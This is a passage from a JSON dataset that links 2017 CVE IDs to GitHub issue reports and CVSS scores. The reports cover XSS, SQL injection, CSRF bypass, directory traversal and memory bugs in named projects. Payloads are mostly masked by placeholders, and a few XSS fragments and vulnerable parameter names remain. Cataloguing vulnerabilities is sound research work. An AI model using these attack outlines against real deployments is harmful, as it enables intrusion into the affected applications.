        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5938",
        "Issue_Url_old": "https://github.com/viewvc/viewvc/issues/137",
        "Issue_Url_new": "https://github.com/viewvc/viewvc/issues/137",
        "Repo_new": "viewvc/viewvc",
        "Issue_Created_At": "2017-01-24T23:46:38Z",
        "description": "XSS vulnerability in nav_path template data. APITAG does not properly escape the names of versioned directories and files before making them available for use via its APITAG HTML template variables. These variables are used in APITAG default templates, and would likely be used in folks' customized templates, too. A user with commit privileges to the repository could introduce a versioned directory or file with a name that contains an executable script (e.g., ERRORTAG ), and the script would be evaluated upon a user's navigation (via web browser) to APITAG view of that directory or file.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5945",
        "Issue_Url_old": "https://github.com/justinhunt/moodle-filter_poodll/issues/23",
        "Issue_Url_new": "https://github.com/justinhunt/moodle-filter_poodll/issues/23",
        "Repo_new": "justinhunt/moodle-filter_poodll",
        "Issue_Created_At": "2017-01-09T09:59:55Z",
        "description": "Moodle NUMBERTAG Plugin APITAG Filter\u201d \u2013 Cross Site Scripting(XSS). Hello: Moodle NUMBERTAG Plugin APITAG Filter\u201d \u2013 Cross Site Scripting(XSS) Procuct: Moodle plugin APITAG Filter\u201d Download url: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in Moodle plugin APITAG Filter\u201d, which can be exploited to add,modify or delete information in application`s database and gain complete control over the application. The vulnerability exists due to insufficientfiltration of user supplied data in \u201cpoodll_audio_url\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below uses the APITAG APITAG function to see a pop up messagebox: POC: URLTAG APITAG NUMBERTAG Could you please help me assign a CVE for this issue?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5946",
        "Issue_Url_old": "https://github.com/rubyzip/rubyzip/issues/315",
        "Issue_Url_new": "https://github.com/rubyzip/rubyzip/issues/315",
        "Repo_new": "rubyzip/rubyzip",
        "Issue_Created_At": "2017-02-04T13:14:48Z",
        "description": "Directory traversal vulnerability. Overview Rubyzip module allows to overwrite or create arbitrary files via relative filenames and thus executing malicious code, e.g. by writing to APITAG ~/.bashrc etc. Proof of concept: ERRORTAG rubyzip_test_traversal.rb : CODETAG Vulnerable version and test environment ERRORTAG Analogous vulnerability in minitar gem: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5950",
        "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/459",
        "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/459",
        "Repo_new": "jbeder/yaml-cpp",
        "Issue_Created_At": "2017-01-17T14:35:37Z",
        "description": "Stack Overflow in APITAG Stack Overflow in APITAG Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-5954",
        "Issue_Url_old": "https://github.com/commenthol/serialize-to-js/issues/1",
        "Issue_Url_new": "https://github.com/commenthol/serialize-to-js/issues/1",
        "Repo_new": "commenthol/serialize-to-js",
        "Issue_Created_At": "2017-02-09T08:11:43Z",
        "description": "APITAG can be abused to achieve arbitrary code injection with an IIFE. ERRORTAG I don't know if this is a functionality as you are using APITAG internally, but the module should not execute code on deserialization.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5959",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/70",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/70",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-02-09T13:23:36Z",
        "description": "CSRF in background management of NUMBERTAG latest version). APITAG implement token to defend CSRF in background management webpage. An attacker is able to bypass the defense as follows: First, visit the FILETAG page and grab a token, which can be used to launch a CSRF attack: APITAG Then, use the following APITAG token used following is in another test.): CODETAG Finally, the response demonstrated that the token is valid: APITAG Thus, we bypass the defense against CSRF, and is able to add an admin account of APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5960",
        "Issue_Url_old": "https://github.com/PhalconEye/phalconeye/issues/133",
        "Issue_Url_new": "https://github.com/phalconeye/phalconeye/issues/133",
        "Repo_new": "phalconeye/phalconeye",
        "Issue_Created_At": "2017-02-10T04:55:21Z",
        "description": "Phalcon Eye Multiple Cross Site Scripting (XSS). Procuct: Phalcon Eye Vendor: Phalcon ( URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered Multiple Cross Site Scripting (XSS) in Phalcon Eye, which can be exploited to add,modify or delete information in application`s database and gain complete control over the application. The vulnerability exists due to insufficientfiltration of user supplied data in multiple HTTP GET parameters passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below uses the APITAG APITAG function to see a pop up messagebo NUMBERTAG URLTAG APITAG NUMBERTAG URLTAG APITAG Could you please help me assign a CVE for this issue?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5961",
        "Issue_Url_old": "https://github.com/ionize/ionize/issues/393",
        "Issue_Url_new": "https://github.com/ionize/ionize/issues/393",
        "Repo_new": "ionize/ionize",
        "Issue_Created_At": "2017-02-10T04:42:51Z",
        "description": "ionize NUMBERTAG Cross Site Scripting (XSS). Procuct: ionize Vendor: ionize ( FILETAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in ionize, which can be exploited to add,modify or delete information in application`s database and gain complete control over the application. The vulnerability exists due to insufficientfiltration of user supplied data in \u201cpath\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: URLTAG Could you please help me assign a CVE for this issue?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5964",
        "Issue_Url_old": "https://github.com/emoncms/emoncms/issues/636",
        "Issue_Url_new": "https://github.com/emoncms/emoncms/issues/636",
        "Repo_new": "emoncms/emoncms",
        "Issue_Created_At": "2017-02-11T17:17:31Z",
        "description": "Emoncms NUMBERTAG lastest version) Multiple Cross Site Scripting (XSS). Procuct: Emoncms NUMBERTAG unlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered multiple Cross Site Scripting (XSS) in Emoncms NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficientfiltration of user supplied data in multiple HTTP GET parameters passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below uses the APITAG APITAG function to see a pop up messagebo NUMBERTAG URLTAG NUMBERTAG URLTAG Could you please help me assign a CVE for this issue?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5990",
        "Issue_Url_old": "https://github.com/phreebooks/PhreeBooksERP/issues/230",
        "Issue_Url_new": "https://github.com/phreebooks/phreebookserp/issues/230",
        "Repo_new": "phreebooks/PhreeBooksERP",
        "Issue_Created_At": "2017-02-11T17:38:17Z",
        "description": "APITAG NUMBERTAG lastest version) Multiple Cross Site Scripting (XSS). Procuct: APITAG Vunlerable Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered multiple Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficientfiltration of user supplied data in \"form\" HTTP GET parameter passed to PATHTAG and PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below uses the APITAG APITAG function to see a pop up messagebo NUMBERTAG URLTAG NUMBERTAG URLTAG Could you please help me assign a CVE for this issue?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6059",
        "Issue_Url_old": "https://github.com/pingidentity/mod_auth_openidc/issues/212",
        "Issue_Url_new": "https://github.com/openidc/mod_auth_openidc/issues/212",
        "Repo_new": "openidc/mod_auth_openidc",
        "Issue_Created_At": "2017-01-18T15:44:38Z",
        "description": "Don't show user supplied content in error pages. First: Thanks for this awesome Apache module! :) \ud83d\ude80 Via our Bug Bounty program URLTAG we got some reports of Text Injections in the error pages such as APITAG which would render as: ERRORTAG While I don't really see this as security relevant issue since spaces etc. are properly converted it would be awesome if the error messages would not show the user supplied content as I'm sure I'll have otherwise to cope with some more of these reports :)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-6062",
        "Issue_Url_old": "https://github.com/pingidentity/mod_auth_openidc/issues/222",
        "Issue_Url_new": "https://github.com/openidc/mod_auth_openidc/issues/222",
        "Repo_new": "openidc/mod_auth_openidc",
        "Issue_Created_At": "2017-01-30T18:06:27Z",
        "description": "Security issue: APITAG pass does not scrub request headers. It seems that when ERRORTAG is set to pass the APITAG headers are not being scrubbed. I am using a configuration as follows: ERRORTAG And as expected I can make unauthenticated requests to APITAG . However if I set my browser to send the APITAG header then this gets passed through to the application, letting me spoof any username. Unless I'm missing something this seems like a rather serious security issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-6065",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/71",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/71",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-02-13T10:16:39Z",
        "description": "SQL injection vulnerability in PATHTAG in APITAG NUMBERTAG latest) discovered by APITAG of Venustech\". PATHTAG (line NUMBERTAG CODETAG The APITAG function in PATHTAG (line NUMBERTAG ERRORTAG The update function in PATHTAG (line NUMBERTAG ERRORTAG We'll find that the \"$key\" in $set .= \" APITAG = '$val',\"; isn't be filtered, which leads to SQL injection. APITAG URLTAG POST parameters: CODETAG Don't forget to get a token first.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6099",
        "Issue_Url_old": "https://github.com/paypal/merchant-sdk-php/issues/129",
        "Issue_Url_new": "https://github.com/paypal/merchant-sdk-php/issues/129",
        "Repo_new": "paypal/merchant-sdk-php",
        "Issue_Created_At": "2017-02-10T16:54:23Z",
        "description": "I have find a Reflected XSS vulnerability in this sdk. Hello: I have find a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in \u201ctoken\u201d HTTP GET parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on _GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG APITAG The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6188",
        "Issue_Url_old": "https://github.com/munin-monitoring/munin/issues/721",
        "Issue_Url_new": "https://github.com/munin-monitoring/munin/issues/721",
        "Repo_new": "munin-monitoring/munin",
        "Issue_Created_At": "2016-07-27T10:07:37Z",
        "description": "munin cgi graph CGI::param security problem. Running munin NUMBERTAG on Gentoo. I observed this message in the logs PATHTAG NUMBERTAG PERL WARNING] CGI::param called in list context from PATHTAG line NUMBERTAG this can lead to vulnerabilities. See the warning in APITAG the value or values of a single named parameter\" at PATHTAG line ERRORTAG . This allows injecting options into munin cgi graph (similar to URLTAG ), by doing something like this: PATHTAG which wrote the graph to /tmp/test.txt",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6194",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/6829",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6829",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-02-21T17:57:07Z",
        "description": "Heap buffer overflow in APITAG Heap buffer overflow in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6197",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/6816",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6816",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-02-19T19:33:03Z",
        "description": "Null pointer dereference in APITAG Null pointer dereference in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6213",
        "Issue_Url_old": "https://github.com/paypal/invoice-sdk-php/issues/13",
        "Issue_Url_new": "https://github.com/paypal/invoice-sdk-php/issues/13",
        "Repo_new": "paypal/invoice-sdk-php",
        "Issue_Created_At": "2017-02-21T10:11:31Z",
        "description": "I have find a Reflected XSS vulnerability in this sdk. Hello: I have find a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in \u201cverification_code\u201d HTTP GET parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-6215",
        "Issue_Url_old": "https://github.com/paypal/permissions-sdk-php/issues/19",
        "Issue_Url_new": "https://github.com/paypal/permissions-sdk-php/issues/19",
        "Repo_new": "paypal/permissions-sdk-php",
        "Issue_Created_At": "2017-02-21T10:28:14Z",
        "description": "I have find a Reflected XSS vulnerability in this sdk. Hello: I have find a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in \u201cverification_code\u201d HTTP REQUEST parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on$_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-6216",
        "Issue_Url_old": "https://github.com/novaksolutions/infusionsoft-php-sdk/issues/111",
        "Issue_Url_new": "https://github.com/novaksolutions/infusionsoft-php-sdk/issues/111",
        "Repo_new": "novaksolutions/infusionsoft-php-sdk",
        "Issue_Created_At": "2017-02-23T03:41:11Z",
        "description": "A Reflected XSS vulnerability in this sdk. Hello: I found a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP _REQUEST parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6217",
        "Issue_Url_old": "https://github.com/paypal/adaptivepayments-sdk-php/issues/87",
        "Issue_Url_new": "https://github.com/paypal/adaptivepayments-sdk-php/issues/87",
        "Repo_new": "paypal/adaptivepayments-sdk-php",
        "Issue_Created_At": "2017-02-21T10:03:58Z",
        "description": "I have find a Reflected XSS vulnerability in this sdk. Hello: I have find a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP GET parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6319",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/6836",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6836",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-02-23T18:09:20Z",
        "description": "SIGSEGV in APITAG SIGSEGV in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6362",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/381",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/381",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2017-02-14T09:42:07Z",
        "description": "libgd double free vulnerability. Description I find the libgd double free vulnerability when call APITAG function. Environment Ubuntu NUMBERTAG libgd NUMBERTAG APITAG commit APITAG Detail ERRORTAG the c code CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-6363",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/383",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/383",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2017-02-17T16:51:11Z",
        "description": "Invalid read when call APITAG Description ======== Hi, when I fuzz the libgd, a invalid read occurs within the function APITAG of gd_tiff.c, it can be triggered by the FILETAG Valgrind tracker ======== ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6387",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/6857",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6857",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-02-27T13:23:17Z",
        "description": "Out of bounds read in APITAG Out of bounds read in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: r2 A r2_hoobr_dex_loadcode ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6390",
        "Issue_Url_old": "https://github.com/soruly/whatanime.ga/issues/8",
        "Issue_Url_new": "https://github.com/soruly/trace.moe/issues/8",
        "Repo_new": "soruly/trace.moe",
        "Issue_Created_At": "2017-02-27T18:14:23Z",
        "description": "whatanime.ga (lastest version) Cross Site Scripting (XSS). Product\uff1awhatanime.ga Download: FILETAG Vunlerable Version: lastest version and probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201curl\u201d HTTP GET parameter passed to \u201cwhatanime.ga APITAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6391",
        "Issue_Url_old": "https://github.com/kaltura/server/issues/5300",
        "Issue_Url_new": "https://github.com/kaltura/server/issues/5300",
        "Repo_new": "kaltura/server",
        "Issue_Created_At": "2017-02-27T14:43:53Z",
        "description": "Kaltura/server (lastest version) Cross Site Scripting (XSS). Produce\uff1akaltura/server Download: URLTAG Vunlerable Version: lastest version Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201ckaltura/server\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6392",
        "Issue_Url_old": "https://github.com/kaltura/server/issues/5303",
        "Issue_Url_new": "https://github.com/kaltura/server/issues/5303",
        "Repo_new": "kaltura/server",
        "Issue_Created_At": "2017-02-27T16:06:15Z",
        "description": "kaltura/server (lastest version) Cross Site Scripting (XSS) in APITAG Product\uff1akaltura/server Download: URLTAG Vunlerable Version: lastest version Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201ckaltura/server\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6393",
        "Issue_Url_old": "https://github.com/NagVis/nagvis/issues/91",
        "Issue_Url_new": "https://github.com/nagvis/nagvis/issues/91",
        "Repo_new": "nagvis/nagvis",
        "Issue_Created_At": "2017-02-27T17:17:01Z",
        "description": "APITAG (lastest version) Cross Site Scripting (XSS). APITAG Download: URLTAG Vunlerable Version: lastest version probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201cWPO Foundation/webpagetest\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201cobject_id\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6394",
        "Issue_Url_old": "https://github.com/openemr/openemr/issues/498",
        "Issue_Url_new": "https://github.com/openemr/openemr/issues/498",
        "Repo_new": "openemr/openemr",
        "Issue_Created_At": "2017-02-27T17:30:54Z",
        "description": "APITAG (lastest version) Multiple Cross Site Scripting (XSS). APITAG Download: URLTAG Vunlerable Version: lastest version probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in multiple HTTP GET parameters passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6395",
        "Issue_Url_old": "https://github.com/jacobwb/hashover-next/issues/152",
        "Issue_Url_new": "https://github.com/jacobwb/hashover-next/issues/152",
        "Repo_new": "jacobwb/hashover-next",
        "Issue_Created_At": "2017-02-27T15:41:28Z",
        "description": "APITAG NUMBERTAG Cross Site Scripting (XSS). APITAG Download: URLTAG Vunlerable Version NUMBERTAG and and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201chashover script\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG APITAG",
